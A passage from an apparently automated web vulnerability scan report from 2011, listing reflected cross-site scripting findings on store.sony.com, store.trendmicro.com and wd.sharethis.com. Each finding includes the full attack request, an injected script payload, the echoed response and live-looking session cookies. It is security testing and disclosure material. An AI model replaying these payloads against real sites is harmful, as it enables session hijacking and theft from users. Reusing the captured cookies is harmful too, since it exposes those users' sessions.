The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d6f1"><a>edd0ae37b53 was submitted in the x parameter. This input was echoed unmodified in the application's response. This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=02d6f1"><a>edd0ae37b53 &y=0 HTTP/1.1 Host: store.sony.com Proxy-Connection: keep-alive Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA
Response
HTTP/1.1 200 OK ntCoent-Length: 115107 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 115107 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 18:58:38 GMT Connection: close Cache-Control: private <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=8" /> <!-- AllSitesHeadInclude --> <script type...[SNIP]... <a href="SearchCatalog?langId=-1&storeId=10151&y=0&catalogId=10551&Nty=1&x=02d6f1"><a>edd0ae37b53 " id="" class="breadBoxRemoveLink" rel="">...[SNIP]...
1.30. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [y parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SearchCatalog
Issue detail
The value of the y request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45ce3"><a>5cf4dd19a25 was submitted in the y parameter. This input was echoed unmodified in the application's response. This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=045ce3"><a>5cf4dd19a25 HTTP/1.1 Host: store.sony.com Proxy-Connection: keep-alive Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA
Response
HTTP/1.1 200 OK ntCoent-Length: 115107 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 115107 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 18:58:51 GMT Connection: close Cache-Control: private <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=8" /> <!-- AllSitesHeadInclude --> <script type...[SNIP]... <a href="SearchCatalog?langId=-1&storeId=10151&y=045ce3"><a>5cf4dd19a25 &catalogId=10551&Nty=1&x=0" id="" class="breadBoxRemoveLink" rel="">...[SNIP]...
1.31. https://store.trendmicro.com/DRHM/store [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://store.trendmicro.com
Path:
/DRHM/store
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c14cf--><script>alert(1)</script>aecb86347bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /DRHM/store?Action=DisplayCheckoutPaymentPage&SiteID=tmamer&Locale=en_US&c14cf--><script>alert(1)</script>aecb86347bd =1 HTTP/1.1 Host: store.trendmicro.com Connection: keep-alive Referer: https://store.trendmicro.com/store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ORA_WX_SESSION="10.2.2.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22t%22%3A1315351267113%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fpharming%2F%22%2C%22l%22%3A%22Pharming%22%2C%22de%22%3A%7B%22su%22%3A%22Malware%20blog%20by%20TrendLabs%20provides%20internet%20security%20research%20information%20on%20worms%20viruses%20trojans%20adware%20and%20other%20internet%20threats%20and%20discusses%20how%20to%20protect%20your%20computer%20data%20from%20being%20hijacked%22%2C%22ti%22%3A%22Malware%20Blog%20%7C%20TrendLabs%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A1544%2C%22nl%22%3A162%7D%7D
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=101360797589,0) Date: Tue, 06 Sep 2011 18:21:54 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app94 Content-Length: 56229 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit...[SNIP]... <!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=5089ab1c&Env=BASE&Locale=en_US&SiteID=tmamer&StyleID=1780400&StyleVersion=42&c14cf--><script>alert(1)</script>aecb86347bd =1&ceid=177147900&cename=TopHeader&id=CheckoutPaymentAnonymousPage"-->...[SNIP]...
1.32. https://store.trendmicro.com/DRHM/store [paymentMethodID%24%2452524 parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://store.trendmicro.com
Path:
/DRHM/store
Issue detail
The value of the paymentMethodID%24%2452524 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c3e0"><script>alert(1)</script>44993469a8dc0473c was submitted in the paymentMethodID%24%2452524 parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /DRHM/store?Action=PostCheckoutPaymentPage&SiteID=tmamer&Locale=en_US&Form=com.digitalriver.template.form.CheckoutPaymentForm&CallingPageID=CheckoutPaymentAnonymousPage&Env=BASE&ORIG_VALUE_verazipInvalidAddress=&verazipInvalidAddress=&ORIG_VALUE_operation=update&operation=update&ORIG_VALUE_mode=anonymous&mode=anonymous&ORIG_VALUE_name1=&name1=&ORIG_VALUE_name2=&name2=&ORIG_VALUE_companyName=&companyName=&ORIG_VALUE_line1=&line1=&ORIG_VALUE_line2=&line2=&ORIG_VALUE_city=&city=&ORIG_VALUE_postalCode=&postalCode=&ORIG_VALUE_state=&state=&ORIG_VALUE_country=&country=&ORIG_VALUE_phoneNumber=&phoneNumber=&ORIG_VALUE_EMAILemail=&EMAILemail=&ORIG_VALUE_EMAILconfirmEmail=&EMAILconfirmEmail=&CLS_DATA_ANALYTICS=WO%3D300%26SO%3D300%26CO%3D300%26DST%3Dfalse&ORIG_VALUE_paymentMethodID%24%2452525=190000&paymentMethodID%24%2452525=190000&ORIG_VALUE_name%24%2452525=PayPalExpress&name%24%2452525=PayPalExpress&ORIG_VALUE_paymentMethodID%24%2452524=-1&paymentMethodID%24%2452524=-12c3e0"><script>alert(1)</script>44993469a8dc0473c &ORIG_VALUE_name%24%2452524=CreditCardMethod&name%24%2452524=CreditCardMethod&ORIG_VALUE_paymentMethodID=-1&paymentMethodID=-1&ORIG_VALUE_cardNumber=&cardNumber=&ORIG_VALUE_cardExpirationMonth=&cardExpirationMonth=&ORIG_VALUE_cardExpirationYear=&cardExpirationYear=&ORIG_VALUE_cardSecurityCode=&cardSecurityCode=&saveMyCcEnabled=false&ORIG_VALUE_saveMyCc=on&saveMyCc=on&ORIG_VALUE_optIn=off&x=27&y=13 HTTP/1.1 Host: store.trendmicro.com Connection: keep-alive Referer: https://store.trendmicro.com/DRHM/store?Action=DisplayCheckoutPaymentPage&SiteID=tmamer&Locale=en_US Cache-Control: max-age=0 Origin: https://store.trendmicro.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ORA_WX_SESSION="10.2.2.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22t%22%3A1315351267113%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fpharming%2F%22%2C%22l%22%3A%22Pharming%22%2C%22de%22%3A%7B%22su%22%3A%22Malware%20blog%20by%20TrendLabs%20provides%20internet%20security%20research%20information%20on%20worms%20viruses%20trojans%20adware%20and%20other%20internet%20threats%20and%20discusses%20how%20to%20protect%20your%20computer%20data%20from%20being%20hijacked%22%2C%22ti%22%3A%22Malware%20Blog%20%7C%20TrendLabs%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A1544%2C%22nl%22%3A162%7D%7D
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=97065992664,0) Date: Tue, 06 Sep 2011 18:24:32 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app94 Content-Length: 56872 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit...[SNIP]... <input type="radio" name="paymentMethodID" value="-12c3e0"><script>alert(1)</script>44993469a8dc0473c " onclick="dispPaymentOption(this.id);dispHandle('autoBill');" id="CreditCardMethod">...[SNIP]...
1.33. https://store.trendmicro.com/DRHM/store [paymentMethodID%24%2452525 parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://store.trendmicro.com
Path:
/DRHM/store
Issue detail
The value of the paymentMethodID%24%2452525 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2d18"><script>alert(1)</script>7d2d858457eeab20b was submitted in the paymentMethodID%24%2452525 parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /DRHM/store?Action=PostCheckoutPaymentPage&SiteID=tmamer&Locale=en_US&Form=com.digitalriver.template.form.CheckoutPaymentForm&CallingPageID=CheckoutPaymentAnonymousPage&Env=BASE&ORIG_VALUE_verazipInvalidAddress=&verazipInvalidAddress=&ORIG_VALUE_operation=update&operation=update&ORIG_VALUE_mode=anonymous&mode=anonymous&ORIG_VALUE_name1=&name1=&ORIG_VALUE_name2=&name2=&ORIG_VALUE_companyName=&companyName=&ORIG_VALUE_line1=&line1=&ORIG_VALUE_line2=&line2=&ORIG_VALUE_city=&city=&ORIG_VALUE_postalCode=&postalCode=&ORIG_VALUE_state=&state=&ORIG_VALUE_country=&country=&ORIG_VALUE_phoneNumber=&phoneNumber=&ORIG_VALUE_EMAILemail=&EMAILemail=&ORIG_VALUE_EMAILconfirmEmail=&EMAILconfirmEmail=&CLS_DATA_ANALYTICS=WO%3D300%26SO%3D300%26CO%3D300%26DST%3Dfalse&ORIG_VALUE_paymentMethodID%24%2452525=190000&paymentMethodID%24%2452525=190000e2d18"><script>alert(1)</script>7d2d858457eeab20b &ORIG_VALUE_name%24%2452525=PayPalExpress&name%24%2452525=PayPalExpress&ORIG_VALUE_paymentMethodID%24%2452524=-1&paymentMethodID%24%2452524=-1&ORIG_VALUE_name%24%2452524=CreditCardMethod&name%24%2452524=CreditCardMethod&ORIG_VALUE_paymentMethodID=-1&paymentMethodID=-1&ORIG_VALUE_cardNumber=&cardNumber=&ORIG_VALUE_cardExpirationMonth=&cardExpirationMonth=&ORIG_VALUE_cardExpirationYear=&cardExpirationYear=&ORIG_VALUE_cardSecurityCode=&cardSecurityCode=&saveMyCcEnabled=false&ORIG_VALUE_saveMyCc=on&saveMyCc=on&ORIG_VALUE_optIn=off&x=27&y=13 HTTP/1.1 Host: store.trendmicro.com Connection: keep-alive Referer: https://store.trendmicro.com/DRHM/store?Action=DisplayCheckoutPaymentPage&SiteID=tmamer&Locale=en_US Cache-Control: max-age=0 Origin: https://store.trendmicro.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ORA_WX_SESSION="10.2.2.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22t%22%3A1315351267113%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fpharming%2F%22%2C%22l%22%3A%22Pharming%22%2C%22de%22%3A%7B%22su%22%3A%22Malware%20blog%20by%20TrendLabs%20provides%20internet%20security%20research%20information%20on%20worms%20viruses%20trojans%20adware%20and%20other%20internet%20threats%20and%20discusses%20how%20to%20protect%20your%20computer%20data%20from%20being%20hijacked%22%2C%22ti%22%3A%22Malware%20Blog%20%7C%20TrendLabs%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A1544%2C%22nl%22%3A162%7D%7D
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=97065978905,0) Date: Tue, 06 Sep 2011 18:24:19 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app94 Content-Length: 56957 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit...[SNIP]... <input type="radio" name="paymentMethodID" value="190000e2d18"><script>alert(1)</script>7d2d858457eeab20b " onclick="dispPaymentOption(this.id);dispHandle('autoHide')" id="PayPalExpress">...[SNIP]...
1.34. http://wd.sharethis.com/api/getCount2.php [cb parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://wd.sharethis.com
Path:
/api/getCount2.php
Issue detail
The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b4556%3balert(1)//83e614a352a was submitted in the cb parameter. This input was echoed as b4556;alert(1)//83e614a352a in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /api/getCount2.php?cb=stButtons.processCBb4556%3balert(1)//83e614a352a &url=http%3A%2F%2Fwww.javaworld.com%2Fjavaworld%2Fjw-10-2007%2Fjw-10-acegi2.html HTTP/1.1 Host: wd.sharethis.com Proxy-Connection: keep-alive Referer: http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==; __uset=yes
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Tue, 06 Sep 2011 17:46:04 GMT Content-Type: text/html Connection: keep-alive Content-Length: 297 (function(){stButtons.processCBb4556;alert(1)//83e614a352a ({"url":"http:\/\/www.javaworld.com\/javaworld\/jw-10-2007\/jw-10-acegi2.html","email":5,"wordpress":1,"slashdot":2,"twitter":1,"stumbleupon":1,"total":10,"ourl":"http:\/\/www.javaworld.com\/javaworld\...[SNIP]...
1.35. http://webconnect.sendouts.com/candidate/my-profile.aspx [Group parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://webconnect.sendouts.com
Path:
/candidate/my-profile.aspx
Issue detail
